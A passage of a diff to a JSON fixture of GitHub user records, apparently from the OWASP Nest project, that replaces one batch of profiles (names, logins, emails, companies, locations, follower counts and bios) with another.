222, + "created_at": "2017-03-05T06:19:03Z", + "updated_at": "2024-09-17T18:33:42Z", + "node_id": "MDQ6VXNlcjI2MTk2MDc2", + "bio": "I 💚 Javascript, building things and problem solving ✨\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2797, + "pk": 8157, "fields": { - "nest_created_at": "2024-09-12T02:23:29.989Z", - "nest_updated_at": "2024-09-18T19:09:18.391Z", - "name": "Marc", - "login": "marc-on-github", + "nest_created_at": "2024-09-22T09:44:15.920Z", + "nest_updated_at": "2024-09-22T19:43:18.664Z", + "name": "Jln Wntr", + "login": "JlnWntr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7252726?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10480293?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-04-10T15:27:25Z", - "updated_at": "2024-09-17T18:25:22Z", - "node_id": "MDQ6VXNlcjcyNTI3MjY=", + "following_count": 5, + "followers_count": 5, + "public_gists_count": 4, + "public_repositories_count": 12, + "created_at": "2015-01-10T21:40:14Z", + "updated_at": "2024-09-17T11:33:14Z", + "node_id": "MDQ6VXNlcjEwNDgwMjkz", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2798, + "pk": 8158, "fields": { - "nest_created_at": "2024-09-12T02:23:30.366Z", - "nest_updated_at": "2024-09-18T19:09:18.711Z", - "name": "John Ellingsworth", - "login": "johnellingsworth", + "nest_created_at": "2024-09-22T09:44:16.231Z", + "nest_updated_at": "2024-09-22T19:43:18.978Z", + "name": "João Pedro Fonseca", + "login": "Jpfonseca", + "email": "jpedrofonseca@outlook.pt", + "avatar_url": "https://avatars.githubusercontent.com/u/11836470?v=4", + "company": "Iquadrat", + "location": "Porto", + "collaborators_count": 0, + "following_count": 346, + "followers_count": 140, + "public_gists_count": 6, + "public_repositories_count": 25, + "created_at": "2015-04-07T13:45:34Z", + "updated_at": "2024-09-21T20:12:15Z", + "node_id": "MDQ6VXNlcjExODM2NDcw", + "bio": "Want to buy me a ☕?\r\nCheck the correct wallets on Keybase.\r\n\r\n", + "is_hireable": true, + "twitter_username": "Jpf0ns3ca" + } +}, +{ + "model": "github.user", + "pk": 8159, + "fields": { + "nest_created_at": "2024-09-22T09:44:16.852Z", + "nest_updated_at": "2024-09-22T19:43:19.610Z", + "name": "", + "login": "lucky70707", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4731674?v=4", - "company": "Ellingsworth", - "location": "United States of America", + "avatar_url": "https://avatars.githubusercontent.com/u/14091290?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 2, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2013-06-18T19:33:21Z", - "updated_at": "2024-09-18T11:25:13Z", - "node_id": "MDQ6VXNlcjQ3MzE2NzQ=", + "public_repositories_count": 6, + "created_at": "2015-09-02T11:15:59Z", + "updated_at": "2023-10-17T21:22:33Z", + "node_id": "MDQ6VXNlcjE0MDkxMjkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430203,49 +689902,49 @@ }, { "model": "github.user", - "pk": 2799, + "pk": 8160, "fields": { - "nest_created_at": "2024-09-12T02:24:01.157Z", - "nest_updated_at": "2024-09-18T19:09:33.023Z", - "name": "romualds", - "login": "romualdszkudlarek", + "nest_created_at": "2024-09-22T09:44:17.172Z", + "nest_updated_at": "2024-09-22T19:43:19.956Z", + "name": "Nitish Dewan", + "login": "nitishdewan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25180888?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90693909?v=4", + "company": "University of Illinois", + "location": "Chicago", "collaborators_count": 0, "following_count": 1, - "followers_count": 6, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-01-17T17:05:27Z", - "updated_at": "2023-09-29T07:52:50Z", - "node_id": "MDQ6VXNlcjI1MTgwODg4", - "bio": "Cybersecurity professional", + "public_repositories_count": 5, + "created_at": "2021-09-14T11:26:58Z", + "updated_at": "2024-09-13T19:45:22Z", + "node_id": "MDQ6VXNlcjkwNjkzOTA5", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2800, + "pk": 8161, "fields": { - "nest_created_at": "2024-09-12T02:24:35.972Z", - "nest_updated_at": "2024-09-18T19:10:00.530Z", - "name": "", - "login": "BackNot", + "nest_created_at": "2024-09-22T09:44:17.823Z", + "nest_updated_at": "2024-09-22T19:43:45.515Z", + "name": "Simon Basset", + "login": "simbas", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37146282?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1901675?v=4", "company": "", - "location": "", + "location": "Aix-en-Provence, France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2018-03-07T13:02:15Z", - "updated_at": "2024-08-13T11:59:02Z", - "node_id": "MDQ6VXNlcjM3MTQ2Mjgy", + "following_count": 11, + "followers_count": 25, + "public_gists_count": 3, + "public_repositories_count": 44, + "created_at": "2012-06-28T08:39:38Z", + "updated_at": "2024-09-11T07:41:19Z", + "node_id": "MDQ6VXNlcjE5MDE2NzU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430253,74 +689952,124 @@ }, { "model": "github.user", - "pk": 2801, + "pk": 8162, "fields": { - "nest_created_at": "2024-09-12T02:25:08.590Z", - "nest_updated_at": "2024-09-12T02:25:08.590Z", - "name": "Sih Sîng-hông薛丞宏", - "login": "sih4sing5hong5", + "nest_created_at": "2024-09-22T09:44:18.141Z", + "nest_updated_at": "2024-09-22T19:43:20.937Z", + "name": "Shivam Luthra", + "login": "shivamluthra", + "email": "sluthra145@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14857486?v=4", + "company": "@firefliesai ", + "location": "Yamunanagar, Haryana, India", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 47, + "created_at": "2015-09-27T06:57:15Z", + "updated_at": "2024-08-28T14:36:19Z", + "node_id": "MDQ6VXNlcjE0ODU3NDg2", + "bio": "Senior Software Engineer @firefliesai . Student Mentor @ GCI '19 under @codeuino. JavaScript maniac. Learner.", + "is_hireable": true, + "twitter_username": "frickyshivam" + } +}, +{ + "model": "github.user", + "pk": 8163, + "fields": { + "nest_created_at": "2024-09-22T09:44:18.810Z", + "nest_updated_at": "2024-09-22T19:43:21.608Z", + "name": "Pierre Grimaud", + "login": "pgrimaud", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5996555?v=4", - "company": "@i3thuan5 ", - "location": "Taiwan", + "avatar_url": "https://avatars.githubusercontent.com/u/1866496?v=4", + "company": "@sezane", + "location": "Paris, France", "collaborators_count": 0, - "following_count": 7, - "followers_count": 131, - "public_gists_count": 11, - "public_repositories_count": 91, - "created_at": "2013-11-21T01:32:24Z", - "updated_at": "2024-09-04T01:51:34Z", - "node_id": "MDQ6VXNlcjU5OTY1NTU=", - "bio": "台語程式開發", + "following_count": 69, + "followers_count": 608, + "public_gists_count": 28, + "public_repositories_count": 114, + "created_at": "2012-06-19T07:59:34Z", + "updated_at": "2024-09-11T20:55:38Z", + "node_id": "MDQ6VXNlcjE4NjY0OTY=", + "bio": "Retired Gladiator / Web3 Enthusiast / PHP & Symfony expert / Powered by Caffeine / SSE @sezane ", + "is_hireable": true, + "twitter_username": "pgrimaud_" + } +}, +{ + "model": "github.user", + "pk": 8164, + "fields": { + "nest_created_at": "2024-09-22T09:44:19.452Z", + "nest_updated_at": "2024-09-22T19:43:22.244Z", + "name": "Nick Liffen", + "login": "NickLiffen", + "email": "nickliffen@github.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6696451?v=4", + "company": "GitHub", + "location": "Reading", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 122, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2014-02-16T13:37:33Z", + "updated_at": "2024-09-19T16:20:08Z", + "node_id": "MDQ6VXNlcjY2OTY0NTE=", + "bio": "Director, GitHub Advanced Security @github ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "nickliffen" } }, { "model": "github.user", - "pk": 2802, + "pk": 8165, "fields": { - "nest_created_at": "2024-09-12T02:25:28.267Z", - "nest_updated_at": "2024-09-12T02:25:28.267Z", - "name": "Fran Navarro Alcaraz", - "login": "fnavalca", + "nest_created_at": "2024-09-22T09:44:19.776Z", + "nest_updated_at": "2024-09-22T19:43:22.555Z", + "name": "003random", + "login": "003random", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13545531?v=4", - "company": "Wallapop", - "location": "Barcelona", + "avatar_url": "https://avatars.githubusercontent.com/u/22357749?v=4", + "company": "", + "location": "poc-server.com", "collaborators_count": 0, - "following_count": 27, - "followers_count": 15, - "public_gists_count": 5, - "public_repositories_count": 8, - "created_at": "2015-07-28T21:21:14Z", - "updated_at": "2024-09-09T10:27:35Z", - "node_id": "MDQ6VXNlcjEzNTQ1NTMx", - "bio": "", + "following_count": 13, + "followers_count": 261, + "public_gists_count": 29, + "public_repositories_count": 48, + "created_at": "2016-09-21T23:09:25Z", + "updated_at": "2024-08-12T19:20:26Z", + "node_id": "MDQ6VXNlcjIyMzU3NzQ5", + "bio": "Fourth yeah cyber security student. Degree in software development. Bug bounty as a hobby. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2803, + "pk": 8166, "fields": { - "nest_created_at": "2024-09-12T02:25:29.457Z", - "nest_updated_at": "2024-09-12T02:25:29.457Z", - "name": "Shraddha G", - "login": "shraddhag", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8229007?v=4", - "company": "", - "location": "London, UK", + "nest_created_at": "2024-09-22T09:44:20.098Z", + "nest_updated_at": "2024-09-22T19:43:22.864Z", + "name": "Aaron Edwards", + "login": "aaron-m-edwards", + "email": "aedwards@thoughtworks.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5952729?v=4", + "company": "Thoughtworks", + "location": "Melbourne", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 6, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-07-21T22:06:19Z", - "updated_at": "2024-06-28T17:56:58Z", - "node_id": "MDQ6VXNlcjgyMjkwMDc=", + "public_repositories_count": 29, + "created_at": "2013-11-16T02:36:20Z", + "updated_at": "2020-05-24T22:57:28Z", + "node_id": "MDQ6VXNlcjU5NTI3Mjk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430328,49 +690077,49 @@ }, { "model": "github.user", - "pk": 2804, + "pk": 8167, "fields": { - "nest_created_at": "2024-09-12T02:25:32.296Z", - "nest_updated_at": "2024-09-18T19:10:12.585Z", - "name": "Anthony Mastrean", - "login": "AnthonyMastrean", - "email": "anthony.mastrean@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/217842?v=4", - "company": "", - "location": "Pittsburgh, PA USA", + "nest_created_at": "2024-09-22T09:44:20.425Z", + "nest_updated_at": "2024-09-22T19:43:23.170Z", + "name": "Abdelarhman Magdy", + "login": "AbdelrhmanMagdy", + "email": "abdelrhman.magdy96@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/21978934?v=4", + "company": "Microsoft", + "location": "Cairo", "collaborators_count": 0, - "following_count": 0, - "followers_count": 71, - "public_gists_count": 37, - "public_repositories_count": 19, - "created_at": "2010-03-07T16:50:44Z", - "updated_at": "2023-11-01T15:22:36Z", - "node_id": "MDQ6VXNlcjIxNzg0Mg==", - "bio": "", - "is_hireable": true, - "twitter_username": "AnthonyMastrean" + "following_count": 31, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2016-09-04T01:13:20Z", + "updated_at": "2024-09-13T21:01:11Z", + "node_id": "MDQ6VXNlcjIxOTc4OTM0", + "bio": "Software engineer @Microsoft", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2805, + "pk": 8168, "fields": { - "nest_created_at": "2024-09-12T02:25:41.701Z", - "nest_updated_at": "2024-09-12T02:25:41.701Z", + "nest_created_at": "2024-09-22T09:44:21.716Z", + "nest_updated_at": "2024-09-22T19:43:24.441Z", "name": "", - "login": "hward6", + "login": "aronsmit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/119614910?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/22457792?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-12-01T16:19:24Z", - "updated_at": "2022-12-01T17:44:20Z", - "node_id": "U_kgDOByEtvg", + "public_repositories_count": 2, + "created_at": "2016-09-26T20:08:30Z", + "updated_at": "2017-11-06T18:33:58Z", + "node_id": "MDQ6VXNlcjIyNDU3Nzky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430378,74 +690127,74 @@ }, { "model": "github.user", - "pk": 2806, + "pk": 8169, "fields": { - "nest_created_at": "2024-09-12T02:25:54.872Z", - "nest_updated_at": "2024-09-18T19:10:27.681Z", - "name": "CRS Project", - "login": "coreruleset", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60900565?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:44:22.036Z", + "nest_updated_at": "2024-09-22T19:43:24.754Z", + "name": "Batuhan Ceylan", + "login": "bceylan", + "email": "batuhan.ceylan@fundingcircle.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12967788?v=4", + "company": "@FundingCircle ", + "location": "London", "collaborators_count": 0, - "following_count": 0, - "followers_count": 133, - "public_gists_count": 0, - "public_repositories_count": 41, - "created_at": "2020-02-10T21:05:36Z", - "updated_at": "2024-09-01T11:32:48Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjYwOTAwNTY1", - "bio": "The first line of defense", + "following_count": 17, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2015-06-19T14:08:51Z", + "updated_at": "2024-08-18T20:05:40Z", + "node_id": "MDQ6VXNlcjEyOTY3Nzg4", + "bio": "", "is_hireable": false, - "twitter_username": "CoreRuleSet" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2807, + "pk": 8170, "fields": { - "nest_created_at": "2024-09-12T02:26:19.877Z", - "nest_updated_at": "2024-09-12T02:26:19.877Z", - "name": "", - "login": "jhimansh", + "nest_created_at": "2024-09-22T09:44:22.667Z", + "nest_updated_at": "2024-09-22T19:43:25.417Z", + "name": "Devansh Batra", + "login": "devanshbatra04", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104558751?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33961252?v=4", "company": "", - "location": "", + "location": "New Delhi, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2022-04-28T08:31:16Z", - "updated_at": "2023-04-20T09:36:40Z", - "node_id": "U_kgDOBjtwnw", - "bio": "", + "following_count": 27, + "followers_count": 104, + "public_gists_count": 1, + "public_repositories_count": 109, + "created_at": "2017-11-24T14:50:53Z", + "updated_at": "2024-08-31T06:57:00Z", + "node_id": "MDQ6VXNlcjMzOTYxMjUy", + "bio": "Enabling machines to see, read, speak, write, hear and move like their makers ;-)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2808, + "pk": 8171, "fields": { - "nest_created_at": "2024-09-12T02:26:23.147Z", - "nest_updated_at": "2024-09-12T02:26:23.147Z", - "name": "Override99", - "login": "afekson", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101624986?v=4", + "nest_created_at": "2024-09-22T09:44:22.981Z", + "nest_updated_at": "2024-09-22T19:43:25.731Z", + "name": "Jan Storm", + "login": "JanStorm", + "email": "jstorm@die-netzwerkstatt.de", + "avatar_url": "https://avatars.githubusercontent.com/u/17730751?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-03-15T07:13:40Z", - "updated_at": "2024-04-14T10:12:00Z", - "node_id": "U_kgDOBg6smg", + "following_count": 1, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2016-03-08T19:48:13Z", + "updated_at": "2024-09-14T20:33:27Z", + "node_id": "MDQ6VXNlcjE3NzMwNzUx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430453,14 +690202,14 @@ }, { "model": "github.user", - "pk": 2809, + "pk": 8172, "fields": { - "nest_created_at": "2024-09-12T02:26:28.144Z", - "nest_updated_at": "2024-09-12T02:26:28.144Z", + "nest_created_at": "2024-09-22T09:44:23.382Z", + "nest_updated_at": "2024-09-22T19:43:26.052Z", "name": "", - "login": "jarofi", + "login": "Stegopax", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/113435794?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/150244307?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -430468,9 +690217,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2022-09-13T11:00:35Z", - "updated_at": "2023-12-20T13:43:40Z", - "node_id": "U_kgDOBsLkkg", + "created_at": "2023-11-08T10:45:21Z", + "updated_at": "2023-11-08T10:45:21Z", + "node_id": "U_kgDOCPSL0w", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430478,24 +690227,24 @@ }, { "model": "github.user", - "pk": 2810, + "pk": 8173, "fields": { - "nest_created_at": "2024-09-12T02:26:42.521Z", - "nest_updated_at": "2024-09-12T02:26:44.602Z", - "name": "Andrew Howe", - "login": "RedXanadu", + "nest_created_at": "2024-09-22T09:44:23.697Z", + "nest_updated_at": "2024-09-22T19:43:26.363Z", + "name": "", + "login": "wayofthepie", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6837454?v=4", - "company": "Loadbalancer.org", - "location": "UK, South Coast", + "avatar_url": "https://avatars.githubusercontent.com/u/1102174?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2014-03-03T08:27:15Z", - "updated_at": "2024-07-17T14:59:59Z", - "node_id": "MDQ6VXNlcjY4Mzc0NTQ=", + "followers_count": 0, + "public_gists_count": 10, + "public_repositories_count": 161, + "created_at": "2011-10-04T15:20:22Z", + "updated_at": "2024-09-19T03:56:04Z", + "node_id": "MDQ6VXNlcjExMDIxNzQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430503,299 +690252,324 @@ }, { "model": "github.user", - "pk": 2811, + "pk": 8174, "fields": { - "nest_created_at": "2024-09-12T02:26:46.274Z", - "nest_updated_at": "2024-09-12T02:26:46.274Z", - "name": "", - "login": "foliv57", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59969260?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:44:24.057Z", + "nest_updated_at": "2024-09-22T19:43:26.684Z", + "name": "Soham Parate", + "login": "sohamparate", + "email": "sohamparate1905@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/91748938?v=4", + "company": "Pune", + "location": "India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-01-16T15:39:43Z", - "updated_at": "2024-03-13T11:57:39Z", - "node_id": "MDQ6VXNlcjU5OTY5MjYw", + "public_repositories_count": 14, + "created_at": "2021-10-01T16:05:02Z", + "updated_at": "2024-09-01T12:30:30Z", + "node_id": "U_kgDOBXf6Sg", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_st1nG__" } }, { "model": "github.user", - "pk": 2812, + "pk": 8175, "fields": { - "nest_created_at": "2024-09-12T02:26:47.546Z", - "nest_updated_at": "2024-09-12T02:26:47.546Z", - "name": "Christian Treutler", - "login": "christiantreutler-avi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29118983?v=4", - "company": "AviNetworks (now part of VMware)", - "location": "", + "nest_created_at": "2024-09-22T09:44:24.375Z", + "nest_updated_at": "2024-09-22T19:43:26.998Z", + "name": "Simon de Lang", + "login": "simondel", + "email": "simondelang@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4221997?v=4", + "company": "@infosupport ", + "location": "The Netherlands", "collaborators_count": 0, - "following_count": 22, - "followers_count": 5, + "following_count": 5, + "followers_count": 38, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-06-01T09:26:57Z", - "updated_at": "2024-07-16T12:56:18Z", - "node_id": "MDQ6VXNlcjI5MTE4OTgz", - "bio": "", + "public_repositories_count": 44, + "created_at": "2013-04-22T07:30:46Z", + "updated_at": "2024-09-17T11:23:00Z", + "node_id": "MDQ6VXNlcjQyMjE5OTc=", + "bio": "Simon is a DevOps engineer and open source fanatic at working Info Support", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2813, + "pk": 8176, "fields": { - "nest_created_at": "2024-09-12T02:26:51.331Z", - "nest_updated_at": "2024-09-12T02:26:51.331Z", - "name": "Mirko Dziadzka", - "login": "MirkoDziadzka", - "email": "mirko.dziadzka@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1268043?v=4", + "nest_created_at": "2024-09-22T09:44:24.704Z", + "nest_updated_at": "2024-09-22T19:43:27.317Z", + "name": "Sakshi Uppoor", + "login": "SakshiUppoor", + "email": "sakshiuppoor@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/46474346?v=4", "company": "", - "location": "Germany", + "location": "Bangalore, India", "collaborators_count": 0, - "following_count": 15, - "followers_count": 17, - "public_gists_count": 8, - "public_repositories_count": 31, - "created_at": "2011-12-16T15:16:02Z", - "updated_at": "2024-07-01T08:58:50Z", - "node_id": "MDQ6VXNlcjEyNjgwNDM=", - "bio": "Old school Unix guy, currently interested in software development, Python, Go, C++, Swift, cluster, security ...\r\n\r\nSee @mirkodziadzka-avi for my work account", - "is_hireable": false, + "following_count": 128, + "followers_count": 128, + "public_gists_count": 7, + "public_repositories_count": 30, + "created_at": "2019-01-08T05:58:21Z", + "updated_at": "2024-04-02T18:58:27Z", + "node_id": "MDQ6VXNlcjQ2NDc0MzQ2", + "bio": "SDE @ Amazon", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2814, + "pk": 8177, "fields": { - "nest_created_at": "2024-09-12T02:26:52.612Z", - "nest_updated_at": "2024-09-12T02:26:52.612Z", - "name": "Syin Wu", - "login": "syinwu", - "email": "bxlxx.wu@outlook.com", - "avatar_url": "https://avatars.githubusercontent.com/u/34093828?v=4", + "nest_created_at": "2024-09-22T09:44:25.052Z", + "nest_updated_at": "2024-09-22T19:43:27.627Z", + "name": "Ryan Tan", + "login": "ryantangit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56660171?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 46, - "followers_count": 18, + "following_count": 2, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2017-11-29T11:04:24Z", - "updated_at": "2024-08-15T01:13:43Z", - "node_id": "MDQ6VXNlcjM0MDkzODI4", - "bio": "", - "is_hireable": true, + "public_repositories_count": 14, + "created_at": "2019-10-17T00:18:08Z", + "updated_at": "2024-08-31T00:21:59Z", + "node_id": "MDQ6VXNlcjU2NjYwMTcx", + "bio": "woooo hoooooooooo\r\n\r\n", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2815, + "pk": 8178, "fields": { - "nest_created_at": "2024-09-12T02:26:53.884Z", - "nest_updated_at": "2024-09-12T02:26:53.884Z", - "name": "Kelson Vibber", - "login": "kvibber", + "nest_created_at": "2024-09-22T09:44:25.368Z", + "nest_updated_at": "2024-09-22T19:43:27.937Z", + "name": "Rotem Reiss", + "login": "rotemreiss", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6667023?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9288082?v=4", "company": "", - "location": "Los Angeles", + "location": "Israel", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-02-13T00:18:05Z", - "updated_at": "2024-08-05T02:38:17Z", - "node_id": "MDQ6VXNlcjY2NjcwMjM=", - "bio": "Techie, software developer, hobbyist photographer, sci-fi/fantasy and comics fan.", + "followers_count": 36, + "public_gists_count": 2, + "public_repositories_count": 68, + "created_at": "2014-10-17T20:25:17Z", + "updated_at": "2024-09-11T11:19:17Z", + "node_id": "MDQ6VXNlcjkyODgwODI=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2816, + "pk": 8179, "fields": { - "nest_created_at": "2024-09-12T02:27:08.817Z", - "nest_updated_at": "2024-09-12T02:27:08.817Z", - "name": "", - "login": "superlgn", + "nest_created_at": "2024-09-22T09:44:25.673Z", + "nest_updated_at": "2024-09-22T19:43:28.253Z", + "name": "Robin Neatherway", + "login": "rneatherway", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4230860?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/243995?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 70, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2013-04-23T03:26:17Z", - "updated_at": "2024-01-17T22:49:33Z", - "node_id": "MDQ6VXNlcjQyMzA4NjA=", - "bio": "In the woods. I was walking ... for Bigfoot, looking ... and then aliens beamed me up.", + "public_repositories_count": 22, + "created_at": "2010-04-14T17:04:36Z", + "updated_at": "2024-09-01T19:10:01Z", + "node_id": "MDQ6VXNlcjI0Mzk5NQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2817, + "pk": 8180, "fields": { - "nest_created_at": "2024-09-12T02:27:17.377Z", - "nest_updated_at": "2024-09-16T22:32:39.517Z", - "name": "Armin Abfalterer", - "login": "arminabf", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3939810?v=4", - "company": "United Security Providers", - "location": "Zurich", + "nest_created_at": "2024-09-22T09:44:26.015Z", + "nest_updated_at": "2024-09-22T19:43:28.567Z", + "name": "Roberto Borges", + "login": "RobertoBorges", + "email": "roborges@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2334235?v=4", + "company": "Microsoft", + "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 12, - "created_at": "2013-03-22T09:35:23Z", - "updated_at": "2024-08-26T09:26:44Z", - "node_id": "MDQ6VXNlcjM5Mzk4MTA=", - "bio": "Cyber Defence Engineer/Architect with a commitment to developing robust security solutions and enabling customers to navigate the evolving threat landscape", + "following_count": 31, + "followers_count": 15, + "public_gists_count": 2, + "public_repositories_count": 162, + "created_at": "2012-09-12T19:11:49Z", + "updated_at": "2024-09-13T11:47:02Z", + "node_id": "MDQ6VXNlcjIzMzQyMzU=", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2818, + "pk": 8181, "fields": { - "nest_created_at": "2024-09-12T02:27:19.026Z", - "nest_updated_at": "2024-09-12T02:27:19.026Z", - "name": "Niklas Weimann", - "login": "niklasweimann", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12865466?v=4", - "company": "@lapid-service-gmbh", - "location": "Germany", + "nest_created_at": "2024-09-22T09:44:26.341Z", + "nest_updated_at": "2024-09-22T19:43:28.885Z", + "name": "Priit Pääsukene", + "login": "priitpaasukene", + "email": "le meh?", + "avatar_url": "https://avatars.githubusercontent.com/u/8225195?v=4", + "company": "Smthngly-Smthngfy", + "location": "Tallinn", "collaborators_count": 0, - "following_count": 28, - "followers_count": 10, + "following_count": 21, + "followers_count": 14, "public_gists_count": 1, - "public_repositories_count": 34, - "created_at": "2015-06-12T20:03:15Z", - "updated_at": "2024-09-06T16:08:36Z", - "node_id": "MDQ6VXNlcjEyODY1NDY2", - "bio": "C# & .net | Backend Developer and DevOps @LapID_Service | #workhardanywhere", + "public_repositories_count": 19, + "created_at": "2014-07-21T14:36:46Z", + "updated_at": "2024-09-10T06:14:12Z", + "node_id": "MDQ6VXNlcjgyMjUxOTU=", + "bio": "Pushing buttons on keyboard, moving mouse pointer, Sarcasm as a Service provider.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2819, + "pk": 8182, "fields": { - "nest_created_at": "2024-09-12T02:27:21.428Z", - "nest_updated_at": "2024-09-12T02:27:21.428Z", - "name": "Tim van Dijen", - "login": "tvdijen", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/841045?v=4", - "company": "SSC-ICT", - "location": "Pijnacker, Netherlands", + "nest_created_at": "2024-09-22T09:44:26.663Z", + "nest_updated_at": "2024-09-22T19:43:29.206Z", + "name": "ADITYA R RUDRA", + "login": "adityaofficial10", + "email": "adityarrudra@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/65034276?v=4", + "company": "National Institute of Technology Karnataka", + "location": "Mangalore", "collaborators_count": 0, - "following_count": 18, - "followers_count": 18, - "public_gists_count": 4, - "public_repositories_count": 58, - "created_at": "2011-06-09T22:31:26Z", - "updated_at": "2024-08-29T05:49:18Z", - "node_id": "MDQ6VXNlcjg0MTA0NQ==", - "bio": "Application specialist, mostly working with open-source 